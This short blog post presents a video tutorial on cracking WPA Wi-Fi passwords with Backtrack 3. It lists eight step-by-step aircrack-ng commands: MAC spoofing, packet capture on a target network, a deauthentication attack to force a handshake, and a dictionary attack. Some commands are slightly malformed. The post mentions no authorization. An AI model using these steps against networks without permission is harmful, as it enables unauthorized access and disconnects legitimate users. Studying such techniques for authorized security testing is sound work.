This Video demonstrates WPA cracking using dictionary based brute force, all tools used in demonstration are available in Backtrack3.
Backtrack is a security penetration testing live open source Linux distro, Backtrack took two of the best, Whax and Auditor and merged them to make one meaningful distro that emerged as an ethical hackers best choice for security auditing. It comes loaded with tools including network mapping, Info gathering, vulnerability Identification tools, and even some for Bluetooth hacking.
Commands Used in video (Step by Step):
1)airmon-ng stop wlan0
2)ifconfig wlan0 down
3)macchanger –mac 00:11:22:33:44:55 wlan0
4)airmon-ng start wlan0
5)airodump-ng wlan0
6)airodump-ng -c (channel) -w (file name) –bssid (bssid) wlan0
7)aireplay-ng -0 5 -a (bssid)wlan0
8)aircrack-ng (filename-01.cap)-w (dictionary location)
Click here to view the embedded video.
Backtrack can be downloaded from here
You may also like this
- WPA crack with Slitaz Aircrack-ng Distribution
- GPU crack WPA 100 times faster then CPU
- BackTrack 4 Artwork Contest
- DirBuster application to brute force hidden directories and files
Original post:
WPA crack with Backtrack 3
0 comments:
Post a Comment